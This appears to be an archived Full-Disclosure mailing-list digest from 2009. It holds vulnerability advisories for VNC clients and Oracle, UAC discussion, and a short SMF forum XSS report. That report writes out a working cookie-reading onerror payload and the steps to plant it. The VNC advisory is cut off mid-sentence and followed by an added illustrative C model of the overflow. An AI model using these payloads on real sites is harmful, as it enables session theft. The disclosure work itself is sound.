Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-03 Thread M.B.Jr.
Windows says: Hello world! Check this out, world, this is really cool.
Now I have, uh, something like, uh, "privileges management"!

"UAC" is no more than a new commercial designation for something that
is about 40 years old.
And they (Redmond) are still missing the concept's point.

On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard wrote:
>> The biggest issue here is that although it's technically easy to fix
>> this problem (just have UAC issue an alert when somebody's messing with
>> the system settings), it involves doing more of what end users dislike
>> most about UAC (it issuing alerts to Joe Sixpack all the time when he
>> does something bone-headed security-wise).
>>
>> Fixing this one in a way that users will put up with will be a bitch.
>
> Why not just have it not prompt if you are changing settings, except for UAC
> settings? That would be the simple way around it.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
Marcio Barbado, Jr.


[Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows

2009-02-03 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

  VNC Multiple Integer Overflows


1. *Advisory Information*

Title: VNC Multiple Integer Overflows
Advisory ID: CORE-2008-1009
Advisory URL: http://www.coresecurity.com/content/vnc-integer-overflows
Date published: 2009-02-03
Date of last update: 2009-02-03
Vendors contacted: UltraVNC, TightVNC
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Integer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 33568
CVE Name: CVE-2009-0388


3. *Vulnerability Description*

Multiple integer overflow vulnerabilities have been discovered in
UltraVNC [1] and TightVNC [2], two (open source) remote control
applications derived from the popular VNC [3] software.

The vulnerabilities cause the size of a heap buffer to be miscalculated,
allowing a malicious server to corrupt the heap of a connecting VNC
client; code execution is probable (exploitation is very likely).


4. *Vulnerable packages*

   . UltraVNC - 1.0.2
   . UltraVNC - 1.0.5
   . TightVNC - 1.3.9
   . Older versions are probably affected too, but they were not tested


5. *Non-vulnerable packages*

   . UltraVNC - 1.0.5.4
   . TightVNC - 1.3.10


6. *Vendor Information, Solutions and Workarounds*

VNC users connecting to untrusted servers should update their VNC
viewers/clients.

The UltraVNC team has released patched binaries [4] for its viewer.
Additional information can be found in the UltraVNC Forum
(http://forum.ultravnc.info/).

The TightVNC team has released patched source code in [5]. TightVNC
1.3.10 will be released by Feb 10th 2009.


7. *Credits*

These vulnerabilities were discovered and researched by Ariel
Futoransky, Fernando Russ and Alfredo Ortega from Core Security
Technologies.


8. *Technical Description / Proof of Concept Code*

Multiple integer overflow vulnerabilities have been discovered in
UltraVNC and TightVNC. The vulnerable functions are located in
'ClientConnection.cpp', and they are:

   . 'ClientConnection::CheckBufferSize'
   . 'ClientConnection::CheckFileZipBufferSize'

These functions are used in UltraVNC - 1.0.2 (and previous versions):

   . 'ClientConnection::ReadServerCutText() : 3859'
   . 'ClientConnection::Authenticate() : 1701'

 And in TightVNC - 1.3.9 (and previous versions):

   . 'ClientConnection::ReadServerCutText() : 2951'
   . 'ClientConnection::ReadFailureReason() : 3066'

 Other versions may be vulnerable too.

Multiple VNC clients are affected, as they share the vulnerable code.
The integer overflow follows this pattern:

/---

unsigned int len; /* note the *unsigned int* */

// read len from the network
len = network.read_placeholder();

// grow the receive buffer so that it is at least as large as needed
CheckBufferSize( len ); // or CheckFileZipBufferSize( len );

// use the receive buffer
// ...

---/

where 'CheckBufferSize' looks like:

/---

(ClientConnection.cpp)

4185:   // Makes sure netbuf is at least as big as the specified size.
4186:   // Note that netbuf itself may change as a result of this call.
4187:   // Throws an exception on failure.
4188:   void ClientConnection::CheckBufferSize(int bufsize)
4189:   {
4190:   if (m_netbufsize > bufsize) return;
...
...

---/

and 'CheckFileZipBufferSize' looks like:

/---

(ClientConnection.cpp)

4238: void ClientConnection::CheckFileZipBufferSize(int bufsize)
4239: {
4240:   unsigned char *newbuf;
4241:
4242:   if (m_filezipbufsize > bufsize) return;
...
...

---/

Other functions, such as 'CheckFileChunkBufferSize()', follow the same
vulnerable pattern. The integer overflow results in heap corruption in
'ReadString()', which is typically called right after 'CheckBufferSize()'.
This is not a comprehensive list of the memory corruptions this bug can
cause, as the vulnerable function is used in many places.

The integer overflow is caused by a type mismatch between the argument
'bufsize' (signed int) and the buffer-size members 'm_netbufsize' and
'm_filezipbufsize' (unsigned long). In the comparison the signed operand
is converted to unsigned long, so a negative 'bufsize' turns into a huge
value:

'(unsigned long)-1 > (int)42 == TRUE'

because the whole comparison is "cast" to unsigned long
(0xffffffff > 0x2a where unsigned long is 32 bits wide).

Steps to reproduce:

The quickest way to reproduce this bug is to modify a VNC server so that
it sends crafted packets, for example by patching the following routine:


/---

(from the TightVNC vncClient.cpp source code...)

358: BOOL vncClientThread::SendTextStringMessage(const char *str)
359: {
360:     CARD32 len = Swap32IfLE(strlen(str));
361:     if (!m_socket->SendExact((char *)&len, sizeof(len)))
362:         return FALSE;
363:     if (!m_socket->SendExact(str, strlen(str)))
364:         return FALSE;
365:
366:     return TRUE;
367: }
...

---/



Modifying line 360, a crafted length like 0x triggers an exception in the
followi
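
The following is an added worked example written for this page; it is not
code from the CORE advisory nor from the UltraVNC/TightVNC sources. It models
in plain C the signed/unsigned comparison the advisory describes: a length
read from the wire is narrowed to a signed int, compared against an unsigned
long buffer size, and then fed into signed arithmetic. The receive-buffer
struct, the "+ 256" reallocation slack, the 1 KiB starting buffer and the
1 MiB policy cap are all assumptions of this example (the advisory shows only
the comparison line). Beside the vulnerable check sits a hardened version that
keeps the length unsigned end to end, caps it before any arithmetic and checks
the addition.

```c
#include <inttypes.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for the client's receive-buffer state. Field names echo
 * m_netbuf / m_netbufsize in ClientConnection.cpp, but this struct and
 * everything below is illustrative, not the UltraVNC/TightVNC source. */
struct netbuf {
    unsigned char *buf;
    unsigned long  size;   /* unsigned long, as the advisory states */
};

/* Vulnerable shape: bufsize is a signed int compared against an unsigned
 * long. The usual arithmetic conversions turn a negative bufsize into a
 * huge unsigned value, so the "already big enough" test is false and the
 * code falls through to reallocate using signed arithmetic on attacker data.
 * Returns the size handed to the allocator, or 0 on the early return.
 * The "+ 256" slack is an assumption of this model. */
static size_t check_buffer_size_vulnerable(const struct netbuf *nb, int bufsize)
{
    if (nb->size > bufsize)         /* bufsize silently promoted to unsigned long */
        return 0;
    int newsize = bufsize + 256;    /* -1 -> 255; INT_MIN -> still negative (UB near INT_MAX) */
    return (size_t)newsize;         /* negative int -> huge size_t -> allocation fails */
}

/* Model of the calling sequence: read a 32-bit length, call the check, then
 * read `len` bytes into the buffer (ReadString). Returns how many bytes that
 * read would overrun the buffer the check left in place (0 = safe), or
 * UINT64_MAX when the wrapped size could never be allocated (exception path). */
static uint64_t vulnerable_overrun(uint32_t len_from_wire)
{
    struct netbuf nb = { NULL, 1024 };     /* assume an existing 1 KiB buffer */
    int bufsize = (int)len_from_wire;      /* the narrowing at the call site; wraps on gcc/clang */
    size_t alloc = check_buffer_size_vulnerable(&nb, bufsize);
    if (alloc > (size_t)INT_MAX)           /* came from a negative int: allocator refuses */
        return UINT64_MAX;
    uint64_t have = alloc ? (uint64_t)alloc : nb.size;
    return len_from_wire > have ? len_from_wire - have : 0;
}

#define MAX_MESSAGE_LEN 1048576u   /* 1 MiB cap on server-supplied text; a policy choice of this example */

/* Hardened check: the length stays unsigned, is rejected against a policy
 * maximum before any arithmetic, and the slack is added in size_t with an
 * explicit overflow test. Both comparison operands are unsigned, so no
 * conversion can turn a small value into a huge one.
 * Returns the new size, 0 if the current buffer suffices, or SIZE_MAX if
 * the request is rejected (the caller must then not read). */
static size_t check_buffer_size_hardened(const struct netbuf *nb, uint32_t len)
{
    if (len > MAX_MESSAGE_LEN)
        return SIZE_MAX;
    if (nb->size > len)                 /* unsigned long vs uint32_t: well defined */
        return 0;
    size_t needed = len;
    if (needed > SIZE_MAX - 256)        /* unreachable under the cap, but kept explicit */
        return SIZE_MAX;
    return needed + 256;
}

int main(void)
{
    /* Constructed probe lengths: benign, the -1 case, the INT_MIN case. */
    uint32_t probes[] = { 42u, 0xffffffffu, 0x80000000u };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        struct netbuf nb = { NULL, 1024 };
        uint64_t over = vulnerable_overrun(probes[i]);
        size_t hard = check_buffer_size_hardened(&nb, probes[i]);
        printf("len=0x%08" PRIx32 "  vulnerable: ", probes[i]);
        if (over == UINT64_MAX)
            printf("allocation fails (exception path)");
        else
            printf("overrun by %" PRIu64 " bytes", over);
        printf("  hardened: %s\n", hard == SIZE_MAX ? "rejected" : "accepted");
    }
    return 0;
}
```

Compile with any C99 compiler and run. In this model a wire length of
0xffffffff leaves a 255-byte buffer in place while the caller goes on to read
about 4 GiB into it, and 0x80000000 drives the allocation size negative; the
hardened check rejects both before a single byte is read, and still grows the
buffer normally for a legitimate 4096-byte request.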

[Full-disclosure] Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART

2009-02-03 Thread Shatter
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Team SHATTER Security Advisory
Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
January 29, 2009
Risk Level:
High

Affected versions:
Oracle Database Server version 9iR2

Remote exploitable:
Yes (Authentication to Database Server is needed)

Credits: 
This vulnerability was discovered and researched by Esteban Martínez Fayó of 
Application Security Inc. 

Details: 
Oracle Database Server provides the SYS.OLAPIMPL_T package. This package 
contains the procedure ODCITABLESTART which is vulnerable to buffer overflow 
attacks.
Impact:
By default, EXECUTE on SYS.OLAPIMPL_T is granted to PUBLIC, so any Oracle
database user can exploit this vulnerability. Exploitation allows an
attacker to execute arbitrary code. It can also be exploited to cause a
denial of service (DoS) by killing the Oracle server process.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Restrict access to the SYS.OLAPIMPL_T package.

Fix:
Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink.

CVE:
CVE-2008-3974

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
http://www.appsecinc.com/resources/alerts/oracle/2009-02.shtml

Timeline:
Vendor Notification - 2/22/2005
Fix - 1/13/2009
Public Disclosure - 1/29/2009

Application Security, Inc's database security solutions have helped over 1000 
organizations secure their databases from all internal and external threats 
while also ensuring that those organizations meet or exceed regulatory 
compliance and audit requirements. 

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0

iD8DBQFJiIWQ9EOAcmTuFN0RAv+kAJ9RjYAJaLMJoNMvVs4yexLgE7KZ3ACgsaf2
W5Hipr89dBLv1um+VRaM9Ds=
=cLj7
-END PGP SIGNATURE-



[Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter)

2009-02-03 Thread Shatter
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Team SHATTER Security Advisory

SQL Injection in Oracle Enterprise Manager (TARGET Parameter)

January 29, 2009

Risk Level:
Medium

Affected versions:
Oracle Enterprise Manager 10g Grid Control 10.2.0.4 and previous patchsets

Remote exploitable:
Yes (Authentication is needed)

Credits: 
This vulnerability was discovered and researched by Esteban Martínez Fayó of 
Application Security Inc. 

Details: 
SQL Injection works by attempting to modify the parameters passed to an 
application to change the SQL statements that are passed to a database. SQL 
injection can be used to insert additional SQL statements to be executed.
The "TARGET" parameter used in web page /em/console/reports/admin of Oracle 
Enterprise Manager web application is vulnerable to SQL Injection attacks. It 
may be possible for a malicious user to execute a function with the elevated 
privileges of the SYSMAN database user in the repository database. This user 
has the DBA role granted.

Impact:
This vulnerability allows an Oracle Enterprise Manager user with VIEW (or
more) privileges to execute a function call with the elevated privileges of
the SYSMAN database user.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this issue.

Fix:
Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink.

CVE:
CVE-2008-5447

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html


Timeline:
Vendor Notification - 7/11/2008
Vendor Response - 7/14/2008
Fix - 1/13/2009
Public Disclosure - 1/29/2009


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0

iD8DBQFJiIST9EOAcmTuFN0RAm6pAKDHp1EHjVu0lxzzNK2ANJJLzMNrvQCgxplB
KsqKYUSlrpMTg9Bc7lKqy+Y=
=bSNt
-END PGP SIGNATURE-



Re: [Full-disclosure] Administrivia: Spring Cleaning

2009-02-03 Thread Pete Licoln
Who cares anyway ?

2009/2/3 Ureleet 

> i guarantee hes watching right now.
>
> On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote:
> > n3td3v being moderated is fantastic.
> >
> > his banning is not a strike against the "spirit" of fd, its someone standing
> > up and saying "I have had enough of this fruitcake".
> >
> > full disclosure is great when its dropping 0day, discussing security in
> > general, coming off as a righteous plan9 ninja, insulting people who
> > disagree with your opinion and all the rest that goes along with it. it isnt
> > great when you have a serial pest constantly baiting people and flooding the
> > list with junk... junk that has no technical or even comedic value. its just
> > rambling. he isnt some passing troll.. 3 years this guy has been spouting
> > his nonsense and i am sure this isnt a decision that John takes lightly but
> > something needed to be done before everyone left.
> >

[Full-disclosure] BBC "cyber war" piece

2009-02-03 Thread imipak
"Nato officials have told the BBC their computers are under constant
attack from organisations and individuals bent on trying to hack into
their secrets."

http://news.bbc.co.uk/go/rss/-/1/hi/world/europe/7851292.stm

(NB - the author of that piece, IMNSHO, has a tendency to sound like
an uncritical mouthpiece for the military-spooky complex.)

=i

-- 
make way for history
flickering like a long-lost memory



Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-03 Thread Valdis . Kletnieks
On Tue, 03 Feb 2009 09:48:48 EST, Ureleet said:
> y not have ur os secure in the first place and designed with full
> permissions instead of bothering the user.  look at linux, look at
> unix.  theyve been doing it 4 years.

Well, that *would* be an alternate way to design a system - but how would
you migrate an existing Windows box to a Windows 8 that did that?  There is
*such* a mass of software written specifically around all the cruft in the
Windows APIs that the inertia is the single biggest reason people keep running
Windows boxes.



Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-03 Thread Ureleet
y not have ur os secure in the first place and designed with full
permissions instead of bothering the user.  look at linux, look at
unix.  theyve been doing it 4 years.

On Mon, Feb 2, 2009 at 2:14 PM, Christopher Pritchard wrote:
>> The biggest issue here is that although it's technically easy to fix
>> this problem (just have UAC issue an alert when somebody's messing with
>> the system settings), it involves doing more of what end users dislike
>> most about UAC (it issuing alerts to Joe Sixpack all the time when he
>> does something bone-headed security-wise).
>>
>> Fixing this one in a way that users will put up with will be a bitch.
>
> Why not just have it not prompt if you are changing settings, except for UAC
> settings? That would be the simple way around it.
>


Re: [Full-disclosure] Administrivia: Spring Cleaning

2009-02-03 Thread Ureleet
i m willing to bet he is still on the list tho.  who knows how many
aliases he has.  no--i m not 1, even tho he accuses me of being 1.

i guarantee hes watching right now.

On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote:
> n3td3v being moderated is fantastic.
>
> his banning is not a strike against the "spirit" of fd, its someone standing
> up and saying "I have had enough of this fruitcake".
>
> full disclosure is great when its dropping 0day, discussing security in
> general, coming off as a righteous plan9 ninja, insulting people who
> disagree with your opinion and all the rest that goes along with it. it isnt
> great when you have a serial pest constantly baiting people and flooding the
> list with junk... junk that has no technical or even comedic value. its just
> rambling. he isnt some passing troll.. 3 years this guy has been spouting
> his nonsense and i am sure this isnt a decision that John takes lightly but
> something needed to be done before everyone left.
>
>


[Full-disclosure] SMF 1.1.7 Persistent XSS (requires permission to edit censor)

2009-02-03 Thread Eduardo Vela
SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/"; onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]

And the HTML code generated will be..
<img src="http://www.test-xss/"; onerror="alert(document.cookie)" alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/
